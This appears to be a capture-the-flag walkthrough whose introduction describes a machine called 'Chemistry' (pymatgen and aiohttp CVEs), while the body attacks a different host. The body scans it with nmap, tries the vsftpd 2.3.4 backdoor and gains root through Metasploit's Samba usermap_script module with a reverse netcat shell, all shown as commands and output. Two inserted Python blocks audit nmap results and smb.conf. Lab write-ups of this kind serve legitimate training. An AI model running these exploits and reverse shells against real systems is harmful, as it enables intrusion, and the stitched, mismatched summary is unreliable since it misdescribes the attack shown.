Chemistry is an easy-difficulty Linux machine that showcases a Remote Code Execution (RCE) vulnerability in the pymatgen (CVE-2024-23346) Python library by uploading a malicious CIF file to the hosted CIF Analyzer website on the target. After discovering and cracking hashes, we authenticate to the target via SSH as rosa user. For privilege escalation, we exploit a Path Traversal vulnerability that leads to an Arbitrary File Read in a Python library called AioHTTP (CVE-2024-23334) which is used on the web application running internally to read the root flag.
Recon
Nmap
We start with a port scan using nmap
```
nmap -sT -p- --min-rate 10000 -oA scans/alltcp 10.10.10.3
Starting Nmap 7.70 ( https://nmap.org ) at 2019-02-28 07:16 EST
Nmap scan report for 10.10.10.3
Host is up (0.021s latency).
Not shown: 65530 filtered ports
PORT     STATE SERVICE
21/tcp   open  ftp
22/tcp   open  ssh
139/tcp  open  netbios-ssn
445/tcp  open  microsoft-ds
3632/tcp open  distccd

Nmap done: 1 IP address (1 host up) scanned in 13.39 seconds
```

```
nmap -sU -p- --min-rate 10000 -oA scans/alludp 10.10.10.3
Starting Nmap 7.70 ( https://nmap.org ) at 2019-02-28 07:17 EST
Nmap scan report for 10.10.10.3
Host is up (0.019s latency).
Not shown: 65531 open|filtered ports
PORT     STATE  SERVICE
22/udp   closed ssh
139/udp  closed netbios-ssn
445/udp  closed microsoft-ds
3632/udp closed distcc

Nmap done: 1 IP address (1 host up) scanned in 13.51 seconds
```

```
nmap -p 21,22,139,445,3632 -sV -sC -oA scans/tcpscripts 10.10.10.3
Starting Nmap 7.70 ( https://nmap.org ) at 2019-02-28 07:19 EST
Nmap scan report for 10.10.10.3
Host is up (0.023s latency).

PORT     STATE SERVICE     VERSION
21/tcp   open  ftp         vsftpd 2.3.4
|_ftp-anon: Anonymous FTP login allowed (FTP code 230)
| ftp-syst:
|   STAT:
| FTP server status:
|      Connected to 10.10.14.24
|      Logged in as ftp
|      TYPE: ASCII
|      No session bandwidth limit
|      Session timeout in seconds is 300
|      Control connection is plain text
|      Data connections will be plain text
|      vsFTPd 2.3.4 - secure, fast, stable
|_End of status
22/tcp   open  ssh         OpenSSH 4.7p1 Debian 8ubuntu1 (protocol 2.0)
| ssh-hostkey:
|   1024 60:0f:cf:e1:c0:5f:6a:74:d6:90:24:fa:c4:d5:6c:cd (DSA)
|_  2048 56:56:24:0f:21:1d:de:a7:2b:ae:61:b1:24:3d:e8:f3 (RSA)
139/tcp  open  netbios-ssn Samba smbd 3.X - 4.X (workgroup: WORKGROUP)
445/tcp  open  netbios-ssn Samba smbd 3.0.20-Debian (workgroup: WORKGROUP)
3632/tcp open  distccd     distccd v1 ((GNU) 4.2.4 (Ubuntu 4.2.4-1ubuntu4))
Service Info: OSs: Unix, Linux; CPE: cpe:/o:linux:linux_kernel

Host script results:
|_clock-skew: mean: 4h39m11s, deviation: 0s, median: 4h39m11s
| smb-os-discovery:
|   OS: Unix (Samba 3.0.20-Debian)
|   NetBIOS computer name:
|   Workgroup: WORKGROUP\x00
|_  System time: 2019-02-28T06:59:11-05:00
|_smb2-time: Protocol negotiation failed (SMB2)

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 52.02 seconds
```

FTP 21 - vsFTPd 2.3.4
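Before looking at the individual services, here is an added example (not part of the original writeup) that parses nmap's normal `-sV` output, like the service scan above, into structured records and flags the findings this writeup goes on to rely on: the backdoored vsftpd 2.3.4 release, the Samba 3.0.20 build, and anonymous FTP being enabled. The `SAMPLE_SCAN` text is a constructed excerpt of the scan above; the `KNOWN_ISSUES` table is an assumption limited to what this writeup establishes, not a general vulnerability database, so on a real engagement it would be replaced by a proper version feed.

```python
"""Parse nmap -sV normal output into service records and flag versions the
writeup above identifies as backdoored or outdated.  Added example, not part
of the original writeup; SAMPLE_SCAN is a constructed excerpt of the scan."""
import re
from dataclasses import dataclass

# Constructed excerpt of the -sV/-sC scan above (most NSE output omitted).
SAMPLE_SCAN = """\
PORT     STATE SERVICE     VERSION
21/tcp   open  ftp         vsftpd 2.3.4
|_ftp-anon: Anonymous FTP login allowed (FTP code 230)
22/tcp   open  ssh         OpenSSH 4.7p1 Debian 8ubuntu1 (protocol 2.0)
139/tcp  open  netbios-ssn Samba smbd 3.X - 4.X (workgroup: WORKGROUP)
445/tcp  open  netbios-ssn Samba smbd 3.0.20-Debian (workgroup: WORKGROUP)
3632/tcp open  distccd     distccd v1 ((GNU) 4.2.4 (Ubuntu 4.2.4-1ubuntu4))
Service Info: OSs: Unix, Linux; CPE: cpe:/o:linux:linux_kernel
"""

# A port line: "<port>/<proto> <state> <service> [<version ...>]"
PORT_LINE = re.compile(
    r"^(?P<port>\d+)/(?P<proto>tcp|udp)\s+(?P<state>\S+)\s+(?P<service>\S+)"
    r"(?:\s+(?P<version>.*))?$"
)


@dataclass
class Service:
    port: int
    proto: str
    state: str
    service: str
    version: str
    script_lines: list  # NSE output attached to this port


def parse_nmap(text):
    """Return one Service per port line; '|' lines attach to the last port."""
    services = []
    for line in text.splitlines():
        m = PORT_LINE.match(line)
        if m:
            services.append(Service(int(m["port"]), m["proto"], m["state"],
                                    m["service"], (m["version"] or "").strip(), []))
        elif line.startswith("|") and services:
            services[-1].script_lines.append(line.lstrip("|_ ").rstrip())
    return services


# Assumption: only the findings this writeup establishes, keyed by version prefix.
KNOWN_ISSUES = {
    "vsftpd 2.3.4": "backdoored release (CVE-2011-2523); replace the package",
    "Samba smbd 3.0.20": 'vulnerable to "username map script" command execution; upgrade Samba',
}


def triage(services):
    """Return (port, note) pairs for open services that need remediation."""
    findings = []
    for s in services:
        if s.state != "open":
            continue
        for prefix, note in KNOWN_ISSUES.items():
            if s.version.startswith(prefix):
                findings.append((s.port, note))
        if any("Anonymous FTP login allowed" in l for l in s.script_lines):
            findings.append((s.port, "anonymous FTP enabled; disable unless required"))
    return findings


if __name__ == "__main__":
    for port, note in triage(parse_nmap(SAMPLE_SCAN)):
        print(f"{port}: {note}")
```

Running the block prints three lines: two for port 21 (the backdoored build and anonymous login) and one for port 445 (the Samba version), which is exactly the order the writeup works through the services.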
Important (failed)
We attempted this attack to get a session with Metasploit, but it failed.
Next, we look up potential vulnerabilities for version 2.3.4 of the service, where we learn that this particular version of the service is backdoored. This vulnerability was assigned CVE-2011-2523. We also find instructions on how to exploit the backdoor, which can be done via Metasploit. First, we launch the Metasploit console:
```
msfconsole
```

Next, we select the vsftpd_234_backdoor module and set the relevant parameters:

```
[msf](Jobs:0 Agents:0) >> use exploit/unix/ftp/vsftpd_234_backdoor
[*] No payload configured, defaulting to cmd/unix/interact
[msf](Jobs:0 Agents:0) exploit(unix/ftp/vsftpd_234_backdoor) >> set rhosts 10.10.10.3
rhosts => 10.10.10.3
```

Finally, we run the module:

```
[msf](Jobs:0 Agents:0) exploit(unix/ftp/vsftpd_234_backdoor) >> run
[*] 10.10.10.3:21 - Banner: 220 (vsFTPd 2.3.4)
[*] 10.10.10.3:21 - USER: 331 Please specify the password.
[*] Exploit completed, but no session was created.
```

The exploit completed, but we were not able to obtain a session.
Foothold
Next, we go back down our nmap recon results and search Metasploit for Samba 3.0.20.
Samba
```
msfconsole
[msf](Jobs:0 Agents:0) >> search Samba 3.0.20

Matching Modules
================

   #  Name                                Disclosure Date  Rank       Check  Description
   -  ----                                ---------------  ----       -----  -----------
   0  exploit/multi/samba/usermap_script  2007-05-14       excellent  No     Samba "username map script"
```

We select the module:

```
msf6 > use 0
[*] No payload configured, defaulting to cmd/unix/reverse_netcat
```

We list the exploit's configuration parameters:

```
msf6 exploit(multi/samba/usermap_script) > options

Module options (exploit/multi/samba/usermap_script):

   Name     Current Setting  Required  Description
   ----     ---------------  --------  -----------
   CHOST                     no        The local client address
   CPORT                     no        The local client port
   Proxies                   no        A proxy chain of format type:host:port[,type:host:port][...]
   RHOSTS                    yes       The target host(s)
   RPORT    139              yes       The target port (TCP)

Payload options (cmd/unix/reverse_netcat):

   Name   Current Setting  Required  Description
   ----   ---------------  --------  -----------
   LHOST  192.168.50.99    yes       The listen address (an interface may be specified)
   LPORT  4444             yes       The listen port

Exploit target:

   Id  Name
   --  ----
   0   Automatic
```

To use this module, set RHOSTS to the target's IP address (the victim machine) and LHOST to your local IP address (typically the tun0 interface on your attacking machine).
Tip (How I remember it:)
- RHOSTS = Remote Host (victim machine)
- LHOST = Local Host (attacker machine)
```
[msf](Jobs:0 Agents:0) exploit(multi/samba/usermap_script) >> set RHOSTS 10.10.10.3
rhosts => 10.10.10.3
[msf](Jobs:0 Agents:0) exploit(multi/samba/usermap_script) >> set LHOST 10.10.14.24
lhost => 10.10.14.24
```

Finally, we launch the exploit with `run`:

```
[msf](Jobs:0 Agents:0) exploit(multi/samba/usermap_script) >> run
[*] Started reverse TCP handler on 10.10.14.24:4444
[*] Command shell session 1 opened (10.10.14.24:4444 -> 10.10.10.3:58344)

id
uid=0(root) gid=0(root)
```

This gives us access as the root user!
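From the defending side, the weakness the usermap_script module depends on is a Samba configuration that sets the `username map script` directive, which hands the username supplied at logon to an external command through a shell. The following is an added example, not from the writeup or from Samba's own tooling: a Python audit that parses an smb.conf, reports that directive wherever it appears, and produces a hardened copy with it commented out so a reviewer can diff the change. The `WEAK_SMB_CONF` text, the script path inside it and the share names are constructed for this example.

```python
"""Audit an smb.conf for the 'username map script' directive that the
usermap_script module above relies on, and emit a hardened copy.  Added
example, not part of the original writeup; the config below is constructed."""
import re

# Constructed smb.conf excerpt resembling a weak configuration (not the target's).
WEAK_SMB_CONF = """\
[global]
   workgroup = WORKGROUP
   server string = %h server (Samba, Ubuntu)
   ; the logon username is passed to this command via a shell
   username map script = /etc/samba/scripts/mapusers.sh
   security = user

[tmp]
   path = /tmp
   writable = yes
"""

SECTION = re.compile(r"^\s*\[(?P<name>[^\]]+)\]\s*$")
# key = value; keys may contain spaces but never '=', ';' or '#'
PARAM = re.compile(r"^(?P<indent>\s*)(?P<key>[^=;#]+?)\s*=\s*(?P<value>.*?)\s*$")

DANGEROUS_KEY = "username map script"


def normalise_key(key):
    """Samba treats parameter names case-insensitively and ignores extra spaces."""
    return " ".join(key.lower().split())


def parse_smb_conf(text):
    """Return {section: {key: value}}, skipping blank and comment lines."""
    sections, current = {}, None
    for line in text.splitlines():
        stripped = line.strip()
        if not stripped or stripped[0] in ";#":
            continue
        m = SECTION.match(line)
        if m:
            current = m["name"].strip().lower()
            sections.setdefault(current, {})
            continue
        m = PARAM.match(line)
        if m and current is not None:
            sections[current][normalise_key(m["key"])] = m["value"]
    return sections


def audit(text):
    """Return (section, finding) pairs for every dangerous setting found."""
    findings = []
    for section, params in parse_smb_conf(text).items():
        if DANGEROUS_KEY in params:
            findings.append((section, f"{DANGEROUS_KEY} = {params[DANGEROUS_KEY]} "
                                      "(logon usernames reach a shell; remove the directive)"))
    return findings


def harden(text):
    """Return a copy with each 'username map script' line commented out and
    every other line left byte-for-byte intact."""
    out = []
    for line in text.splitlines():
        m = PARAM.match(line)
        if m and normalise_key(m["key"]) == DANGEROUS_KEY:
            out.append(f"{m['indent']}; disabled by audit: {line.strip()}")
        else:
            out.append(line)
    return "\n".join(out) + "\n"


if __name__ == "__main__":
    for section, finding in audit(WEAK_SMB_CONF):
        print(f"[{section}] {finding}")
    print(harden(WEAK_SMB_CONF))
```

The audit runs on any smb.conf (`audit(open("/etc/samba/smb.conf").read())`), and because `harden` rewrites only the offending lines, the output can be reviewed with `diff` before it replaces the live file; the version finding from the scan above still needs a package upgrade, which this check does not cover.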